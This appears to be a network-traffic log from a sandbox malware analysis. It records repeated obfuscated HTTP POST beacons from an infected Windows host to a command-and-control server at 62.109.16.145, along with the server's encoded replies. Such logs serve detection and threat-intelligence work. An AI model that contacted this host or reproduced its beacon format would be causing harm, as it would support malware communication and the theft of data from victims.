Jan 9, 2025 04:12:08.143637896 CET	405	IN	Data Raw: 58 51 61 05 51 51 59 67 56 53 6f 00 4c 61 06 08 53 69 60 7e 02 7c 52 07 69 7f 5f 46 58 6b 07 64 45 50 74 4e 09 6b 06 5c 4d 6c 04 73 59 6a 04 59 47 5b 5c 05 50 56 62 65 5a 77 5b 7b 7d 69 6a 52 50 67 65 01 41 58 4f 7b 40 7b 5b 54 59 50 00 71 4a 52 Data Ascii: XQaQQYgVSoLaSi`~\|Ri_FXkdEPtNk\MlsYjYG[\PVbeZw[{}ijRPgeAXO{@{[TYPqJRe]HQ[ZZnC]}r`Zjk\|y_dgq\EYonFPs@lUAnwCRnTXY~l`Z{^VZ`dCWq`\qs{j`d^QJxK{XPUZ{EQoUA[XSVRoZW[auZd_q_Z_m^rP}wyYcaBZyoVPoS`@UpUFloaYuGhjppX
Jan 9, 2025 04:12:08.173893929 CET	404	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 384 Expect: 100-continue
Jan 9, 2025 04:12:08.394454002 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 04:12:08.394629955 CET	384	OUT	Data Raw: 5f 56 59 51 5f 5b 58 59 55 56 55 5a 56 5e 55 53 56 51 5a 5c 55 5c 53 57 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: _VYQ_[XYUVUZV^USVQZ\U\SWT[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW%%9/X -$2"]<07<=(:&)-S<'2Y<^=(X+ \%#Y)<
Jan 9, 2025 04:12:08.619560957 CET	324	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:08 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Content-Type: text/html; charset=UTF-8 Data Raw: 0c 1a 20 00 22 2a 2e 5b 3f 31 2b 12 3c 12 30 0e 2b 22 38 5b 29 33 2a 04 29 14 2e 5b 2b 3e 3f 1d 3f 02 22 5d 33 21 26 54 23 2e 07 03 36 0a 2e 59 0c 1d 39 5a 29 5d 25 0e 27 30 23 5a 3e 1d 21 02 21 22 3c 02 26 2d 29 0f 30 3b 34 55 28 31 3c 1e 3e 22 3c 08 2d 5e 39 40 24 30 3d 08 24 3e 21 5e 02 14 23 5b 2a 5b 3c 0d 2a 37 2f 1b 25 1c 2d 0a 20 2d 26 51 22 01 24 09 36 28 00 17 2b 21 22 12 37 0f 2c 5b 30 0d 2e 1b 21 32 22 0c 2a 23 2f 5c 2b 03 2b 49 01 31 55 56 Data Ascii: ".[?1+<0+"8[)3).[+>??"]3!&T#.6.Y9Z)]%'0#Z>!!"<&-)0;4U(1<>"<-^9@$0=$>!^#[[<7/%- -&Q"$6(+!"7,[0.!2"*#/\++I1UV
Jan 9, 2025 04:12:08.648483038 CET	405	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 1048 Expect: 100-continue
Jan 9, 2025 04:12:08.874059916 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 04:12:08.874296904 CET	1048	OUT	Data Raw: 5a 52 59 5e 5f 5e 58 5f 55 56 55 5a 56 5f 55 5d 56 56 5a 5e 55 51 53 58 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: ZRY^_^X_UVUZV_U]VVZ^UQSXT[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW&^$:0"(>'!"+$#;(861!V+#[&/?7,_?/ \%#Y)
Jan 9, 2025 04:12:09.099127054 CET	151	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:08 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3e 52 5a 55 Data Ascii: >RZU

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 04:12:08.760488987 CET	405	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 1760 Expect: 100-continue
Jan 9, 2025 04:12:09.106985092 CET	1760	OUT	Data Raw: 5f 55 59 5b 5f 5e 58 5e 55 56 55 5a 56 5b 55 56 56 56 5a 5c 55 54 53 5a 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: _UY[_^X^UVUZV[UVVVZ\UTSZT[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW&'9$ =]$9)=<4%0=&-P<38%3'^? \%#Y)(
Jan 9, 2025 04:12:09.453919888 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 04:12:09.584614992 CET	324	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:09 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Content-Type: text/html; charset=UTF-8 Data Raw: 0c 1a 23 12 22 07 00 10 3f 31 28 07 28 12 23 13 28 1f 23 01 2b 20 2d 5e 3d 3a 39 00 29 13 38 08 28 5d 2a 18 24 32 3a 1e 37 00 00 1e 23 20 2e 59 0c 1d 39 5c 29 3b 22 51 32 23 27 5d 3d 30 31 01 35 31 06 07 30 3e 29 0a 24 2b 3b 0b 3e 22 30 1d 2a 31 0d 1a 2e 5e 22 1e 24 23 0c 51 25 2e 21 5e 02 14 23 5d 28 3d 09 1f 3e 0e 37 59 31 1c 2e 52 20 2d 36 50 21 06 3f 50 22 16 39 05 3e 31 3e 12 20 31 38 58 30 33 00 1a 37 32 21 57 2b 33 2f 5c 2b 03 2b 49 01 31 55 56 Data Ascii: #"?1((#(#+ -^=:9)8(]$2:7# .Y9\);"Q2#']=01510>)$+;>"01.^"$#Q%.!^#](=>7Y1.R -6P!?P"9>1> 18X0372!W+3/\++I1UV
Jan 9, 2025 04:12:09.660954952 CET	405	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 1048 Expect: 100-continue
Jan 9, 2025 04:12:09.874926090 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 04:12:09.875093937 CET	1048	OUT	Data Raw: 5a 54 59 5e 5f 5a 58 51 55 56 55 5a 56 5b 55 57 56 50 5a 5e 55 5c 53 56 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: ZTY^_ZXQUVUZV[UWVPZ^U\SVT[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW&[%:/ ;:312(-+Z#6/](;%&*-W<3$1?#)7$[< \%#Y)(
Jan 9, 2025 04:12:10.093835115 CET	151	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:09 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3e 52 5a 55 Data Ascii: >RZU

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 04:12:10.265770912 CET	405	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 1048 Expect: 100-continue
Jan 9, 2025 04:12:10.622083902 CET	1048	OUT	Data Raw: 5f 57 59 51 5f 5b 5d 5d 55 56 55 5a 56 5e 55 51 56 50 5a 5c 55 51 53 59 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: _WYQ_[]]UVUZV^UQVPZ\UQSYT[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW&]39 0&[<.+X#C;8=29P+^$,8Y70_+ \%#Y)<
Jan 9, 2025 04:12:10.962954044 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 04:12:11.101396084 CET	151	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:10 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3e 52 5a 55 Data Ascii: >RZU

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 04:12:11.332812071 CET	429	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 04:12:11.684586048 CET	1048	OUT	Data Raw: 5f 57 59 5a 5f 5e 5d 5b 55 56 55 5a 56 5e 55 5d 56 54 5a 5a 55 57 53 5c 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: _WYZ_^][UVUZV^U]VTZZUWS\T[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW&'/Z -&!"?7Y7>629#;Y&/X=0[?/ \%#Y)<
Jan 9, 2025 04:12:12.031838894 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 04:12:12.164664984 CET	207	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:11 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3e 52 5a 55 Data Ascii: >RZU

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 04:12:13.069086075 CET	429	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 04:12:13.418982029 CET	1048	OUT	Data Raw: 5a 56 59 50 5f 58 58 5f 55 56 55 5a 56 5b 55 51 56 51 5a 52 55 54 53 59 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: ZVYP_XX_UVUZV[UQVQZRUTSYT[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW%39#;%_$!&?3Y#%'*2><001<8X>Q<^+ \%#Y)(
Jan 9, 2025 04:12:13.761442900 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 04:12:13.958256960 CET	207	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3e 52 5a 55 Data Ascii: >RZU
Jan 9, 2025 04:12:13.958275080 CET	207	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:13 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3e 52 5a 55 Data Ascii: >RZU

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 04:12:14.627882957 CET	429	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 1760 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 04:12:14.981462955 CET	1760	OUT	Data Raw: 5a 51 59 5d 5a 5b 5d 5a 55 56 55 5a 56 5d 55 57 56 5d 5a 5e 55 51 53 5d 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: ZQY]Z[]ZUVUZV]UWV]Z^UQS]T[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW%0),"+32)?+[ %'=8)%9.? <&<3=7/?/ \%#Y)0
Jan 9, 2025 04:12:15.305710077 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 04:12:15.437514067 CET	380	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:15 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 152 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 0c 1a 20 04 35 5f 3a 11 2b 0c 2c 01 2b 2f 37 55 3f 31 2f 01 2b 33 2a 02 3d 39 22 11 2b 2e 27 13 3c 15 35 04 27 22 2a 55 23 3e 2e 59 21 20 2e 59 0c 1d 3a 05 2a 3b 26 51 25 0d 0a 03 28 23 3a 58 21 0f 28 06 27 3e 04 57 30 5e 27 0c 3c 1c 30 56 3e 32 3c 0b 39 06 25 42 24 1d 32 57 25 2e 21 5e 02 14 23 58 3d 2d 06 0c 3e 37 23 5f 26 22 03 0e 34 5b 25 0c 22 28 27 50 22 28 2d 04 2b 21 26 58 20 08 24 12 27 30 21 0a 37 0f 31 1d 2a 09 2f 5c 2b 03 2b 49 01 31 55 56 Data Ascii: 5_:+,+/7U?1/+3=9"+.'<5'"U#>.Y! .Y:;&Q%(#:X!('>W0^'<0V>2<9%B$2W%.!^#X=->7#_&"4[%"('P"(-+!&X $'0!71/\++I1UV

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 04:12:18.306689024 CET	429	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 04:12:18.653373957 CET	1048	OUT	Data Raw: 5a 56 59 5a 5f 5a 58 58 55 56 55 5a 56 5a 55 52 56 52 5a 5b 55 51 53 57 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: ZVYZ_ZXXUVUZVZURVRZ[UQSWT[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW&['*/Z"+1^'2Y<=77#)+5[1&(0;^%<0=Q/+ \%#Y),
Jan 9, 2025 04:12:19.018223047 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 04:12:19.149487019 CET	207	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:18 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3e 52 5a 55 Data Ascii: >RZU

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 04:12:19.496148109 CET	429	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 04:12:19.841090918 CET	1048	OUT	Data Raw: 5f 56 5c 5a 5f 59 58 5e 55 56 55 5a 56 51 55 5c 56 55 5a 58 55 56 53 57 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: _V\Z_YX^UVUZVQU\VUZXUVSWT[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW%0)34;20T2]("%=]')%Q?#;Y1<0\>,^+/ \%#Y)
Jan 9, 2025 04:12:20.083512068 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 04:12:20.213495970 CET	207	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:19 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3e 52 5a 55 Data Ascii: >RZU

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 04:12:20.433672905 CET	429	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 04:12:20.778449059 CET	1048	OUT	Data Raw: 5a 5a 5c 5b 5f 5f 58 59 55 56 55 5a 56 51 55 52 56 54 5a 59 55 50 53 5f 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: ZZ\[__XYUVUZVQURVTZYUPS_T[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW&\%9X"+$:Z+>/\7$>92:9V*3[1,8=$$^?? \%#Y)
Jan 9, 2025 04:12:21.129836082 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 04:12:21.261413097 CET	207	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:21 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 3e 52 5a 55 Data Ascii: >RZU

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 04:12:20.455913067 CET	429	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 1760 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 04:12:20.810765028 CET	1760	OUT	Data Raw: 5a 56 59 5e 5a 5e 58 5e 55 56 55 5a 56 5b 55 55 56 5c 5a 5d 55 52 53 5b 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: ZVY^Z^X^UVUZV[UUV\Z]URS[T[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW&Z$<#-$.Z)>X4&$>=2%S?3/&,3)^+? \%#Y)(
Jan 9, 2025 04:12:21.166315079 CET	25	IN	HTTP/1.1 100 Continue

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 04:12:21.412786961 CET	405	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 1048 Expect: 100-continue
Jan 9, 2025 04:12:21.762804031 CET	1048	OUT	Data Raw: 5a 50 5c 59 5f 5a 58 58 55 56 55 5a 56 50 55 56 56 53 5a 5a 55 51 53 5d 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: ZP\Y_ZXXUVUZVPUVVSZZUQS]T[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW&[30#8=$!2\??#&0=*&?3[%,0>(/ \%#Y)
Jan 9, 2025 04:12:22.107428074 CET	25	IN	HTTP/1.1 100 Continue
Jan 9, 2025 04:12:22.238374949 CET	151	IN	HTTP/1.1 200 OK Date: Thu, 09 Jan 2025 03:12:22 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 4 Content-Type: text/html; charset=UTF-8 Data Raw: 3e 52 5a 55 Data Ascii: >RZU

Timestamp	Bytes transferred	Direction	Data
Jan 9, 2025 04:12:22.405718088 CET	429	OUT	POST /protect4Dump/externalUpdateDle/requestLongpollPublicRequest/Cdnjs/LinuxasyncJavascript/provider/trafficuniversalapi/Vmjavascripteternal1/db/requestDatalife/ImagevideoLineserverprotectLinuxasyncTest.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 62.109.16.145 Content-Length: 1048 Expect: 100-continue Connection: Keep-Alive
Jan 9, 2025 04:12:22.762742043 CET	1048	OUT	Data Raw: 5f 50 5c 5c 5a 58 58 5b 55 56 55 5a 56 5b 55 52 56 5d 5a 5a 55 55 53 57 54 5b 58 59 52 58 5d 50 42 5a 54 5b 5f 57 50 5c 5e 5f 55 5d 5a 52 51 5d 5a 51 43 5a 46 5e 58 5a 5e 56 50 58 54 52 58 5c 5a 54 59 5f 5a 5f 55 57 5f 5d 42 51 47 57 47 56 52 54 Data Ascii: _P\\ZXX[UVUZV[URV]ZZUUSWT[XYRX]PBZT[_WP\^_U]ZRQ]ZQCZF^XZ^VPXTRX\ZTY_Z_UW_]BQGWGVRTPQV]^D_R]PXZ[ZT\\ZT\]STU]_^TXT^^UV_UXT__X]WS\Q^P^^_S_HXP[SWBP_TYRBQ]VSGX^_Y\\PBQY\[_ZT_^SXZ^Y_]PTQ[]ZW&3(7+&3+./\#3*-1_%(#+^$/]>7;< \%#Y)(
Jan 9, 2025 04:12:23.092768908 CET	25	IN	HTTP/1.1 100 Continue
